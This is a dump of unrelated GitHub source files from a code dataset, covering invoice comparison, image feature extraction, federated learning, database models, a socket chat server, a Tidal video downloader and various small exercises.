element.equal_amount_paid else None\n worksheet.write(row, col + 3, element.amount_paid, format_)\n\n format_ = fmt_error if not element.equal_gst_paid else None\n worksheet.write(row, col + 4, element.gst_paid, format_)\n\n format_ = fmt_error if not element.equal_total else None\n worksheet.write(row, col + 5, element.total, format_)\n\n errors = []\n line_a = element.row_number\n if element.pair is not None:\n line_b = element.pair.row_number\n if write_errors:\n if not element.equal_amount_paid:\n errors.append(\n new_error(\n invoice.filename,\n invoice.pair.filename,\n \"Amount Paid does not match\",\n line_a,\n line_b,\n element.amount_paid,\n element.pair.amount_paid,\n )\n )\n\n if not element.equal_gst_paid:\n errors.append(\n new_error(\n invoice.filename,\n invoice.pair.filename,\n \"GST Paid does not match\",\n line_a,\n line_b,\n element.gst_paid,\n element.pair.gst_paid,\n )\n )\n\n if not element.equal_total:\n errors.append(\n new_error(\n invoice.filename,\n invoice.pair.filename,\n \"Total does not match\",\n line_a,\n line_b,\n element.total,\n element.pair.total,\n )\n )\n\n else:\n if write_errors:\n errors.append(\n new_error(\n invoice.filename, invoice.pair.filename, \"No corresponding row in commission file\", line_a, \"\"\n )\n )\n else:\n errors.append(\n new_error(\n invoice.filename, invoice.pair.filename, \"No corresponding row in commission file\", \"\", line_a\n )\n )\n return errors\n\n\ndef read_files_referrer(dir_: str, files: list) -> dict:\n records = {}\n counter = 1\n errors = []\n for file in files:\n print(f\"Parsing {counter} of {len(files)} files from {bcolors.BLUE}{dir_}{bcolors.ENDC}\", end=\"\\r\")\n if os.path.isdir(dir_ + file):\n continue\n # try:\n ti = ReferrerTaxInvoice(dir_, file)\n records[ti.key] = ti\n # except IndexError:\n # # handle exception when there is a column missing or an issue with the file.\n # errors.append(new_error(f\"{dir_}/{file}\", \"\", \"ERROR PARSING FILE!!!\"))\n counter += 1\n print()\n return records, errors\n","repo_name":"qkhan/rcti_comparison","sub_path":"src/model/taxinvoice_referrer.py","file_name":"taxinvoice_referrer.py","file_ext":"py","file_size_in_byte":21544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"7045243504","text":"from ...utils import get_graphql_content\n\nUSER_QUERY = \"\"\"\nquery CustomerDetails($id:ID!){\n user(id: $id) {\n id\n email\n isConfirmed\n isActive\n orders(first: 10){\n edges {\n node {\n id\n number\n paymentStatus\n created\n }\n }\n }\n }\n}\n\"\"\"\n\n\ndef get_user(\n staff_api_client,\n user_id,\n):\n variables = {\"id\": user_id}\n\n response = staff_api_client.post_graphql(\n USER_QUERY,\n variables,\n )\n content = get_graphql_content(response)\n\n data = content[\"data\"][\"user\"]\n\n return data\n","repo_name":"saleor/saleor","sub_path":"saleor/tests/e2e/users/utils/get_user.py","file_name":"get_user.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":19331,"dataset":"github-code","pt":"67"} +{"seq_id":"22255006459","text":"\n# coding: utf-8\n\n# In[43]:\n\n\nimport numpy as np\nfrom PIL import Image\nfrom scipy.misc import imread\nfrom skimage import transform,data\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport random\nimport cv2\n#设置k值和取样数\nk = 7\nTEST_RATE = 20\n#X_train = np.loadtxt(\"train_X.txt\")\n#已经处理好的特征矩阵\ncolors = np.loadtxt(\"colors.txt\")\nLBP_hist = np.loadtxt(\"LBP_hist.txt\")\n\ndef LBP(img):#LBP算法,提取图像纹理特征\n col, row = img.shape\n tempSave = []\n dataLBP = []\n for i in range(1,col-1):\n for j in range(1,row-1):\n if img[i][j] > img[i-1][j-1]:#\n tempSave.append(0)\n else:\n tempSave.append(1)\n if img[i][j] > img[i-1][j]:#\n tempSave.append(0)\n else:\n tempSave.append(1)\n if img[i][j] > img[i-1][j+1]:#\n tempSave.append(0)\n else:\n tempSave.append(1)\n if img[i][j] > img[i][j+1]:#\n tempSave.append(0)\n else:\n tempSave.append(1)\n if img[i][j] > img[i+1][j+1]:#\n tempSave.append(0)\n else:\n tempSave.append(1)\n if img[i][j] > img[i+1][j]:#\n tempSave.append(0)\n else:\n tempSave.append(1)\n if img[i][j] > img[i+1][j-1]:#\n tempSave.append(0)\n else:\n tempSave.append(1)\n if img[i][j] > img[i][j-1]:#\n tempSave.append(0)\n else:\n tempSave.append(1)\n temp = [str(k) for k in tempSave]\n p = ''.join(temp)\n dataLBP.append(int(p,2))\n tempSave = []\n a = np.array([dataLBP])\n return a#a为一维行向量\n\n'''\n数据处理,利用LBP提取纹理特征后,做成训练矩阵\n\nfor i in range(1,201):\n s=\"%s%s%d%s%s\"%('train_data/','data (',i,')','.jpg')#原图片名为data (i).jpg\n im = Image.open(s)\n L = im.convert('L')#转化为灰度图\n s=\"%s%d%s\"%('train/',i,'.jpg')\n L.save(s)\nimg = imread('train/1.jpg')\ntrain_X = LBP(img)\nfor i in range(2,201):\n s=\"%s%d%s\"%('train/',i,'.jpg')\n img = imread(s)\n img = LBP(img)\n train_X = np.concatenate((train_X,img), axis = 0)#将每个图片的特征拼接起来,成为(200,22940)的矩阵\nnp.savetxt(\"train_X.txt\",train_X)\n \n '''\n\n'''\n加载训练好的LBP特征,将其作为LBP直方图\nx_train = np.loadtxt(\"train_X.txt\")\nX_train = np.ones([200,256])\nX = []\nprint(x_train.shape)\nfor i in range(200):\n for j in range(256):\n for x in map(lambda x:(j<=x and x 1:\n raise app.UsageError('Too many command-line arguments.')\n\n tf.compat.v1.enable_v2_behavior()\n run_experiment()\n\n\nif __name__ == '__main__':\n app.run(main)\n","repo_name":"i-m-sankha16/federated","sub_path":"tensorflow_federated/python/research/baselines/stackoverflow/run_centralized.py","file_name":"run_centralized.py","file_ext":"py","file_size_in_byte":6587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"67"} +{"seq_id":"14165022591","text":"from sqlalchemy import Column, String, BigInteger, ForeignKey, Text, Integer, Index, DateTime\nfrom sqlalchemy.dialects.mysql import MEDIUMBLOB, MEDIUMTEXT\n\nfrom .base import BasicMixin, BaseObject\n\n\nclass ExternalEmail(BaseObject, BasicMixin):\n address = Column(String(128), unique=True)\n active_confirm = Column(DateTime)\n user_id = Column(BigInteger, ForeignKey('users.id'))\n disabled = Column(Integer)\n\n\nclass InternalEmail(BaseObject, BasicMixin):\n address = Column(String(128), unique=True)\n\n\nclass InternalEmailMap(BaseObject, BasicMixin):\n internal_email_id = Column(BigInteger, ForeignKey('internal_emails.id'))\n user_id = Column(BigInteger, ForeignKey('users.id'))\n group_id = Column(BigInteger, ForeignKey('groups.id'))\n\n\nclass Message(BaseObject, BasicMixin):\n internal_email_id = Column(BigInteger, ForeignKey('internal_emails.id'))\n message_to = Column(String(128))\n message_from = Column(String(128))\n message_text = Column(Text)\n message_dump = Column(MEDIUMTEXT)\n reply_address = Column(String(128), unique=True)\n\n\nclass MessageQueueStatus:\n STATUS_UNPROCESSED = 0\n STATUS_ERROR = 1\n STATUS_SENT = 2\n STATUS_DELIVERED = 3\n STATUS_BOUNCE_TEMP = 4\n STATUS_BOUNCE_PERM = 5\n\n\nclass MessagePriority:\n PRIORITY_HIGH = 0\n PRIORITY_PLUS = 25\n PRIORITY_NORMAL = 50\n PRIORITY_MINUS = 75\n PRIORITY_LOW = 100\n\n PRIORITY_ON_DEMAND = PRIORITY_HIGH\n PRIORITY_DEFAULT = PRIORITY_NORMAL\n\n PRIORITY_PRE_MAILING_LIST = PRIORITY_NORMAL + 5\n PRIORITY_MAILING_LIST = PRIORITY_NORMAL + 10\n PRIORITY_POST_MAILING_LIST = PRIORITY_NORMAL + 15\n\n\nclass MessageQueue(BaseObject, BasicMixin, MessageQueueStatus, MessagePriority):\n content_type = Column(Text)\n message_dump = Column(MEDIUMBLOB)\n status = Column(Integer, nullable=False, default=0)\n error_text = Column(Text)\n priority = Column(Integer, nullable=False, default=0)\n user_id = Column(BigInteger)\n from_message_id = Column(BigInteger, ForeignKey('messages.id'))\n mailgun_message_id = Column(String(256))\n\n __table_args__ = (\n Index('idx_status', 'status'),\n Index('idx_mailgun_message_id', 'mailgun_message_id'),\n )\n\n @classmethod\n def default_sort_column(cls):\n return cls.priority, cls.user_id, cls.from_message_id, cls.status\n","repo_name":"yu-ichiro/database","sub_path":"model/email.py","file_name":"email.py","file_ext":"py","file_size_in_byte":2324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"30326746885","text":"from __future__ import print_function\n\nimport numpy as np \nfrom fs_fdr import knockoff_features_construction, barber_candes_selection, utils\n\n\nn, p, p1 = 1000, 50, 20\nrho = 0.\nmean = 0.\nsd = 1.\nerror_std = 1.\nx = mean + sd * np.random.normal(0., 1., size=(n, p))\ntrue_w = np.random.uniform(r[1], r[2], size=(p1, 1))\nnegate = np.random.binomial(n=1, p=.5, size=(p1, 1))\nnegate[np.where(negate==0.), :] = -1\ntrue_w = true_w * negate\ntrue_index = np.random.choice(np.arange(p), size = p1, replace=False)\ntrue_index = np.sort(true_index)\nxbeta = np.dot(x[:, true_index], true_w)\npr = 1/(1+np.exp(-xbeta))\nt = (pr > .5) + 0.\n\nq = .1\n\n\nmodelings = [\\\n{\"model\":\"logistic regression\", \"params\":\"plain regression coef\"},\\\n{\"model\":\"logistic regression\", \"params\":\"ridge coef\"},\\\n{\"model\":\"logistic regression\", \"params\":\"lasso coef\"},\\\n{\"model\":\"logistic regression\", \"params\":\"lasso learning rate\"},\\\n{\"model\":\"random forest\", \"params\":\"classification fi\"},\\\n{\"model\":\"tree\", \"params\":\"classification fi\"},\\\n{\"model\":\"gradient boosting\", \"params\":\"classification fi\"},\\\n{\"model\":\"svm\", \"params\":\"classification coef\"}\\\n]\n\nVI_stats = [\"Diff\"]\nselection_methods = [\"knockoff-MX\"]\noptimizations = [\"SDP\", \"samplecorr\"]\n\n \nfor selection_method in selection_methods:\n\tfor optimization in optimizations:\n\n\t\tmyknockoff = knockoff_features_construction.Knockoff(x, selection_method, optimization)\n\t\tknockoff_attrs = myknockoff.knockoff_features()\n\t\tx, x_tilda = knockoff_attrs.X, knockoff_attrs.X_tilde\n\t\tdata = [x, x_tilda, t] \n\n\t\tfor modeling in modelings:\n\t\t\tfor VI_stat in VI_stats:\n\n\t\t\t\tknockoff_selection = barber_candes_selection.BarberCandesSelection(data, modeling, selection_method,q=q, VI_stat=VI_stat).selection()\n\t\t\t\tS_knock = knockoff_selection.S\n\n\t\t\t\tfdr_knock = 100*utils.FDR(S_knock, true_index)\n\t\t\t\tpower_knock = 100*utils.power(S_knock, true_index)\n\t\t\t\twith open('{}-{}.txt'.format(selection_method, type), 'a') as f:\n\t\t\t\t\tprint('------------Knockoff ({})-------------'.format(modeling[\"model\"]), file=f)\n\t\t\t\t\tprint(selection_method +\"-\"+ optimization +\"-\"+ modeling[\"model\"] +\"-\"+ modeling[\"params\"] +\"-\"+ VI_stat, file=f)\n\t\t\t\t\tprint(\"FDR: \" +str(fdr_knock) + \"%\", file=f)\n\t\t\t\t\tprint(\"power: \"+str(power_knock) + \"%\", file=f)\n\nf.close()\n\nexit()\nsplit_type = [[\"splitting\"], [\"sampling\", 3, 3]]\nprob = .5\nselection_method = [\"knockoff\", \"DSS\", \"MSS\"]","repo_name":"mehdirostami/feature_selection_fdr","sub_path":"tests/knockoff_classification.py","file_name":"knockoff_classification.py","file_ext":"py","file_size_in_byte":2355,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"23675824178","text":"import sys \n# 유클리드 호제법 최대공약수 (b, a%b)를 나눈 값 중 0 이 나온것과 같다.\nN, M = map(int, input().split(' '))\ndef gcd(a,b):\n while a > 0:\n r = a%b \n if r == 0:\n return b \n else:\n a = b \n b = r \ndef lcm(a,b): # 최소공배수는 두 수의 곱을 최대공약수로 나눈 것과 같다.\n return int((a*b)/ gcd(a,b))\nif N < M:\n N, M = M, N\nprint(N,M)\nprint(gcd(N,M))\n# print(lcm(N, M))","repo_name":"amo33/study_projects","sub_path":"Study/python_start/2609.py","file_name":"2609.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"5592643501","text":"import socket\nimport sys\nimport threading\n\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n\n\nif len(sys.argv) != 2:\n print('Arguments are incorrect - Please use script Port Number')\n exit()\n\n\nport = int(sys.argv[1])\n\nsock.bind((\"0.0.0.0\", port))\n\nsock.listen(10)\n\nclients = []\n\n\n\ndef thread(connect, add):\n connect.send(\"Welcome to this interesting chatroom!\")\n while True:\n try:\n message = connection.recv(1024)\n if message:\n print (add[0] + \" \" + message)\n message_to_send = add[0] + \" \" + message\n broadcast(message_to_send, connect)\n else:\n remove(connect)\n except ValueError:\n continue\n\ndef broadcast(message, connect):\n for client in clients:\n if client != connect:\n try:\n client.send(message)\n except:\n client.close()\n remove(client)\n\ndef remove(client):\n if client in clients:\n clients.remove(client)\n\nwhile True:\n connection, address = sock.accept()\n clients.append(connection)\n\n print (address[0] + \" has been connected!\")\n\n thread = threading.Thread(target = thread, args = (connection, address))\n thread.daemon = True\n thread.start()\n\nconnection.close()\nsock.close()","repo_name":"ribhavh/ChatRoom---Python","sub_path":"chatServer.py","file_name":"chatServer.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"41108363804","text":"\"\"\"\nconstants.py\n\nStore constants relating to the external authentication backend.\n\"\"\"\n\n# Base urls.\nAUTH_BASE_URL = \"https://titandash.net\"\nAUTH_API_URL = \"/api\"\n\n# Endpoints.\nAUTH_AUTHENTICATE_ENDPOINT = \"/authenticate\"\nAUTH_STATE_ENDPOINT = \"/state\"\nAUTH_SIGNUP_ENDPOINT = \"/auth/register\"\nAUTH_ACCOUNT_ENDPOINT = \"/account\"\nAUTH_RELEASE_ENDPOINT = \"/release\"\n\n# Urls.\nAUTH_AUTHENTICATE_URL = \"{base}{api}{authenticate}\".format(base=AUTH_BASE_URL, api=AUTH_API_URL, authenticate=AUTH_AUTHENTICATE_ENDPOINT)\nAUTH_STATE_URL = \"{base}{api}{state}\".format(base=AUTH_BASE_URL, api=AUTH_API_URL, state=AUTH_STATE_ENDPOINT)\nAUTH_SIGNUP_URL = \"{base}{signup}\".format(base=AUTH_BASE_URL, signup=AUTH_SIGNUP_ENDPOINT)\nAUTH_ACCOUNT_URL = \"{base}{account}\".format(base=AUTH_BASE_URL, account=AUTH_ACCOUNT_ENDPOINT)\nAUTH_RELEASE_URL = \"{base}{api}{release}\".format(base=AUTH_BASE_URL, api=AUTH_API_URL, release=AUTH_RELEASE_ENDPOINT)\n","repo_name":"hohenheim52/titandash","sub_path":"titanbot/titanauth/authentication/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"29766188545","text":"import os\nimport re\nimport shutil\nimport unicodedata\n\nimport ffmpeg\nimport requests\nfrom mutagen.easymp4 import EasyMP4\nfrom mutagen.mp4 import MP4Cover\nfrom mutagen.mp4 import MP4Tags\n\n# Needed for Windows tagging support\nMP4Tags._padding = 0\n\n\ndef normalize_key(s):\n # Remove accents from a given string\n return ''.join(c for c in unicodedata.normalize('NFD', s) if unicodedata.category(c) != 'Mn')\n\n\ndef parse_master_playlist(masterurl: str):\n content = str(requests.get(masterurl, verify=False).content)\n pattern = re.compile(r\"(?<=RESOLUTION=)[0-9]+x[0-9]+\")\n resolution_list = pattern.findall(content)\n pattern = re.compile(r\"(?<=http).+?(?=\\\\n)\")\n plist = pattern.findall(content)\n playlists = [{'height': int(resolution_list[i].split('x')[1]),\n 'url': \"http\" + plist[i]} for i in range(len(plist))]\n\n return sorted(playlists, key=lambda k: k['height'], reverse=True)\n\n\ndef parse_playlist(url: str):\n content = requests.get(url, verify=False).content\n pattern = re.compile(r\"(?<=http).+?(?=\\\\n)\")\n plist = pattern.findall(str(content))\n urllist = []\n for item in plist:\n urllist.append(\"http\" + item)\n\n return urllist\n\n\ndef download_file(urllist: list, part: int, filename: str):\n if os.path.isfile(filename):\n # print('\\tFile {} already exists, skipping.'.format(filename))\n return None\n\n r = requests.get(urllist[part], stream=True, verify=False)\n try:\n total = int(r.headers['content-length'])\n except KeyError:\n return False\n\n with open(filename, 'wb') as f:\n cc = 0\n for chunk in r.iter_content(chunk_size=1024):\n cc += 1024\n if chunk: # filter out keep-alive new chunks\n f.write(chunk)\n f.close()\n\n\ndef print_video_info(track_info: dict):\n line = '\\tTitle: {0}\\n\\tArtist: {1}\\n\\tType: {2}\\n\\tResolution: {3}'.format(track_info['title'],\n track_info['artist']['name'],\n track_info['type'],\n track_info['resolution'])\n try:\n print(line)\n except UnicodeEncodeError:\n line = line.encode('ascii', 'replace').decode('ascii')\n print(line)\n print('\\t----')\n\n\ndef download_video_artwork(image_id: str, where: str):\n url = 'https://resources.tidal.com/images/{0}/{1}x{2}.jpg'.format(\n image_id.replace('-', '/'), 1280, 720)\n\n r = requests.get(url, stream=True, verify=False)\n\n try:\n total = int(r.headers['content-length'])\n except KeyError:\n return False\n with open(where, 'wb') as f:\n cc = 0\n for chunk in r.iter_content(chunk_size=1024):\n cc += 1024\n print(\n \"\\tDownload progress: {0:.0f}%\".format((cc / total) * 100),\n end='\\r')\n if chunk: # filter out keep-alive new chunks\n f.write(chunk)\n print()\n return True\n\n\ndef tags(video_info: dict, tagger=None, ftype=None):\n if tagger is None:\n tagger = {'id': video_info['id'], 'quality': ' [' + video_info['quality'][4:] + ']'}\n\n tagger['title'] = video_info['title']\n tagger['artist'] = video_info['artist']['name']\n if ftype:\n tagger['tracknumber'] = str(video_info['trackNumber']).zfill(2) + '/' + str(video_info['volumeNumber'])\n else:\n tagger['tracknumber'] = str(video_info['trackNumber']).zfill(2)\n tagger['discnumber'] = str(video_info['volumeNumber'])\n\n if 'explicit' in video_info:\n if ftype:\n tagger['explicit'] = b'\\x01' if video_info['explicit'] else b'\\x02'\n else:\n tagger['explicit'] = ' [E]' if video_info['explicit'] else ''\n\n if video_info['releaseDate']:\n # TODO: less hacky way of getting the year?\n tagger['date'] = str(video_info['releaseDate'][:4])\n\n return tagger\n\n\ndef tag_video(file_path: str, track_info: dict, credits_dict: dict, album_art_path: str):\n tagger = EasyMP4(file_path)\n tagger.RegisterTextKey('explicit', 'rtng')\n\n # Add tags to the EasyMP4 tagger\n tags(track_info, tagger, ftype='mp4')\n\n pic = None\n with open(album_art_path, 'rb') as f:\n pic = MP4Cover(f.read())\n tagger.RegisterTextKey('covr', 'covr')\n tagger['covr'] = [pic]\n\n if credits_dict:\n for key, value in credits_dict.items():\n key = normalize_key(key)\n # Create a new freeform atom and set the contributors in bytes\n tagger.RegisterTextKey(key, '----:com.apple.itunes:' + key)\n tagger[key] = [bytes(con, encoding='utf-8') for con in value]\n\n tagger.save(file_path)\n\n\ndef download_stream(folder_path: str, file_name: str, url: str, resolution: int, video_info: dict, credits_dict: dict):\n tmp_folder = os.path.join(folder_path, 'tmp')\n playlists = parse_master_playlist(url)\n urllist = []\n\n for playlist in playlists:\n if resolution >= playlist['height']:\n video_info['resolution'] = playlist['height']\n urllist = parse_playlist(playlist['url'])\n break\n\n if len(urllist) <= 0:\n print('Error: list of URLs is empty!')\n return False\n\n print_video_info(video_info)\n\n if not os.path.isdir(tmp_folder):\n os.makedirs(tmp_folder)\n\n filelist_loc = os.path.join(tmp_folder, 'filelist.txt')\n\n if os.path.exists(filelist_loc):\n os.remove(filelist_loc)\n\n filename = \"\"\n for i in range(len(urllist)):\n try:\n filename = os.path.join(tmp_folder, str(i).zfill(3) + '.ts')\n download_file(urllist, i, filename)\n with open(filelist_loc, 'a') as f:\n f.write(\"file '\" + str(i).zfill(3) + '.ts' + \"'\\n\")\n percent = i / (len(urllist) - 1) * 100\n print(\"\\tDownload progress: {0:.0f}%\".format(percent), end='\\r')\n # print(percent)\n \n # Delete partially downloaded file on keyboard interrupt\n except KeyboardInterrupt:\n if os.path.isfile(filename):\n print('\\tDeleting partially downloaded file ' + str(filename))\n os.remove(filename)\n raise\n # print(\"\\tDownload progress: {0:.0f}%\".format(percent), end='\\r')\n print(\"\\n\\tDownload succeeded!\")\n\n file_path = os.path.join(folder_path, file_name + '.mp4')\n\n (\n ffmpeg\n .input(filelist_loc, format='concat', safe=0)\n .output(file_path, vcodec='copy', acodec='copy', loglevel='warning')\n .overwrite_output()\n .run()\n )\n print('\\tConcatenation succeeded!')\n shutil.rmtree(tmp_folder)\n\n print('\\tDownloading album art ...')\n aa_location = os.path.join(folder_path, 'Cover.jpg')\n if not os.path.isfile(aa_location):\n if not download_video_artwork(video_info['imageId'], aa_location):\n aa_location = None\n\n print('\\tTagging video file...')\n tag_video(file_path, video_info, credits_dict, aa_location)\n","repo_name":"Dniel97/RedSea","sub_path":"redsea/videodownloader.py","file_name":"videodownloader.py","file_ext":"py","file_size_in_byte":7114,"program_lang":"python","lang":"en","doc_type":"code","stars":134,"dataset":"github-code","pt":"67"} +{"seq_id":"40402012908","text":"from django.conf.urls import include, url\nfrom rest_framework.routers import DefaultRouter\nfrom .views import (\n BarViewSet, BarsFavoriteAPIView, BarsPromotionViewSet\n)\n\napp_name = 'bars'\n\nrouter = DefaultRouter()\nrouter.register(r'bars', BarViewSet) #Retrieve & List & Create Bar\nrouter.register(r'promotions', BarsPromotionViewSet)\n\nurlpatterns = [\n url(r'^', include(router.urls)),\n url(r'^bars/(?P[-\\w]+)/favorite/?$',BarsFavoriteAPIView.as_view()),\n\n]\n","repo_name":"alexzarazuaa/SeekBar","sub_path":"backend/bars/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"75418070293","text":"from helper import FileSystem \ndef main():\n fs = FileSystem(\"/home/ritwiz/Desktop/commvault\")\n\n while True:\n print(\"Options:\")\n print(\"1. Create File\")\n print(\"2. Edit File\")\n print(\"3. Delete File\")\n print(\"4. Get File Details\")\n print(\"5. Revert to Version\")\n print(\"6. Copy File\")\n print(\"7. Move File\")\n print(\"8. Append To File\")\n print(\"9. Quit\")\n\n choice = input(\"Enter your choice: \")\n\n if choice == \"1\":\n file_name = input(\"Enter the file name: \")\n content = input(\"Enter the file content: \")\n fs.create_file(file_name, content)\n elif choice == \"2\":\n file_name = input(\"Enter the file name: \")\n new_content = input(\"Enter the new content: \")\n fs.edit_file(file_name, new_content)\n elif choice == \"3\":\n file_name = input(\"Enter the file name: \")\n fs.delete_file(file_name)\n elif choice == \"4\":\n file_name = input(\"Enter the file name: \")\n fs.get_details(file_name)\n elif choice == \"5\":\n file_name = input(\"Enter the file name: \")\n version_number = int(input(\"Enter the version number: \"))\n fs.revert_to_version(file_name, version_number)\n elif choice == \"6\":\n file_name = input(\"Enter the file name: \")\n new_path = input(\"Enter the destination path: \")\n fs.copy_file(file_name, new_path)\n elif choice == \"7\":\n file_name = input(\"Enter the file name: \")\n new_path = input(\"Enter the destination path: \")\n fs.move_file(file_name, new_path)\n elif choice == \"8\":\n file_name = input(\"Enter the file name: \")\n new_content = input(\"Enter the new content which is to be appended: \")\n fs.append_to_file(file_name, new_content)\n elif choice =='9':\n break\n else:\n print(\"Invalid choice. Please select a valid option.\")\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Ritwiz20/File-System-Management","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2073,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"22742044550","text":"from django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.index),\n url(r'^new$', views.new),\n url(r'^create$', views.create),\n url(r'^(?P\\d+)/favorite$', views.favorite),\n url(r'^(?P\\d+)/popfavback$', views.popfavback),\n url(r'^(?P\\d+)/remove$', views.remove),\n url(r'^(?P\\d+)/delete$', views.delete),\n url(r'^logout$', views.logout)\n] \n","repo_name":"meltedfork/Django","sub_path":"more_courses/apps/coursefavs/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"34006925124","text":"\"\"\"\n middleware\n\"\"\"\nfrom django.utils.deprecation import MiddlewareMixin\nfrom .exception import *\nfrom django.http import JsonResponse\n\nclass ExceptionHandleMiddleware(MiddlewareMixin):\n def process_exception(self, request, exception):\n if isinstance(exception, ParamError):\n response = JsonResponse(\n status=400,\n data=dict(\n status_code=400,\n msg=exception.message,\n errors=exception.error\n )\n )\n return response\n\n if isinstance(exception, PermError):\n response = JsonResponse(status=403, data=dict(status_code=401, msg=exception.message))\n return response\n\n if isinstance(exception, NotFoundError):\n response = JsonResponse(status=404, data=dict(status_code=404, msg=exception.message))\n return response\n","repo_name":"movekj/monkey","sub_path":"backend/utils/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"2914501093","text":"import json\nimport csv\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nhandleintimes = open(\"./Metricstest/inlabtimes.csv\", 'rb')\nhandleouttimes = open(\"./Metricstest/outlabtimes.csv\", 'rb')\n\ninlabtimes = []\noutlabtimes = []\n\n\nwith handleintimes as infile:\n\tparsed = csv.reader(infile)\n\tfor row in parsed:\n\t\tinlabtimes = np.array(list(row)).astype(np.float)\n\nwith handleouttimes as infile:\n\tparsed = csv.reader(infile)\n\tfor row in parsed:\n\t\toutlabtimes = np.array(list(row)).astype(np.float)\n\nbins = np.arange(0, 1480, 10)\n\n'''\n#print len(inlabtimes)\n#print len(outlabtimes)\n#print len(inlabtimes)\n#print len(outlabtimes)\n\n\nprint np.var(inlabeff)\nprint np.var(outlabeff)\nprint np.var(inlabtimes)\nprint np.var(outlabtimes)\nprint np.var(inlabspeeds)\nprint np.var(outlabspeeds)\n\n\n#print inlabtimes\n#print outlabtimes\n\n'''\n\n\n#speed, change back when done!!!\ninlabtimes = np.array(inlabtimes)\noutlabtimes = np.array(outlabtimes)\n\nsdvinlab = np.std(inlabtimes)\nmeaninlab = np.mean(inlabtimes)\nlabel1 = [\"$\\mu$: \" + str(meaninlab) + \"\\n\" + \"$\\sigma$: \" + str(sdvinlab)]\nplt.hist(inlabtimes, bins, label = label1)\n#plt.hist(inlabtimes, bins, label = label1)\n#plt.title(\"Probability density $f(x)$ of in-lab mousepath efficiency \\n weighted by duration of mouse sequence\")\nplt.title(\"Histogram of mouse path time length in lab\")\nplt.xlabel(\"Mouse path sequence time duration\")\n#plt.ylabel(\"# of mouse path sequences\")\nplt.ylabel(\"Number of mouse path sequences\")\nplt.xticks(np.arange(0, 1480, 100), rotation = 'vertical')\nplt.legend(loc=\"best\")\nplt.show()\n#plt.savefig('./Metricgraphs/' + \"inLabPDFexcl\" + '.png')\n#plt.savefig('./Metricgraphs/' + \"PDFinLab\" + '.png')\n#plt.savefig('./Metricgraphs/' + \"WeightedinLabHist\" + '.png')\n#plt.savefig('./Metricgraphs/' + \"inLabTimeHist1\" + '.png')\nplt.clf()\n\nsdvoutlab = np.std(outlabtimes)\nmeanoutlab = np.mean(outlabtimes)\nlabel2 = [\"$\\mu$: \" + str(meanoutlab) + \"\\n\" + \"$\\sigma$: \" + str(sdvoutlab)]\nplt.hist(outlabtimes, bins, label = label2)\n#plt.hist(outlabtimes, bins, label = label2)\n#plt.title(\"Probability density $f(x)$ of out-of-lab mousepath efficiency \\n weighted by duration of mouse sequence\")\nplt.title(\"Histogram of mouse path time length out of lab\")\nplt.xlabel(\"Mouse path sequence time duration\")\n#plt.ylabel(\"# of mouse path sequences\")\nplt.ylabel(\"Number of mouse path sequences\")\nplt.xticks(np.arange(0, 1480, 100), rotation = 'vertical')\nplt.legend(loc=\"best\")\nplt.show()\n#plt.savefig('./Metricgraphs/' + \"OutOfLabPDFexcl\" + '.png')\n#plt.savefig('./Metricgraphs/' + \"PDFOutOfLab\" + '.png')\n#plt.savefig('./Metricgraphs/' + \"WeightedOutOfLabHist\" + '.png')\n#plt.savefig('./Metricgraphs/' + \"outLabTimeHist1\" + '.png')\nplt.clf()\n\n\n#print sdvinlab\n#print meaninlab\n#print sdvoutlab\n#print meanoutlab\n\n'''\ndata = [inlabtimes, outlabtimes]\nplt.boxplot(data, 1)\nplt.title(\"Total in lab efficiency (left) vs. Total out of lab efficiency (right)\")\nplt.ylabel('Efficiency (optimal/actual path lengths')\n#plt.savefig('./Metricgraphs/' + \"TotalBoxPlot\" + '.png')\nplt.show()\nplt.clf()\n\n'''","repo_name":"DylanDrein/Python-FYP","sub_path":"GraphsTime.py","file_name":"GraphsTime.py","file_ext":"py","file_size_in_byte":3050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"71972278932","text":"#!/usr/bin/env python\n# coding: utf-8\n#\n# Day 8: Space Image Format\n#\n# https://adventofcode.com/2019/day/8\n#\n# By Stefan Kruger\n\nfrom collections import Counter\nBLACK = 0\nWHITE = 1\nTRANSP = 2\n\n\ndef read_data(filename=\"data/input08.data\"):\n with open(filename) as f:\n return list(map(int, list(f.read().splitlines()[0])))\n\n\ndef make_image(xmax, ymax, digits):\n nd = (d for d in digits)\n layers = []\n while True:\n layer = [[0] * xmax for _ in range(ymax)]\n for y in range(ymax):\n for x in range(xmax):\n try:\n layer[y][x] = next(nd)\n except StopIteration:\n return layers\n layers.append(layer)\n\n\ndef checksum(layers):\n best = None\n for layer in layers:\n c = 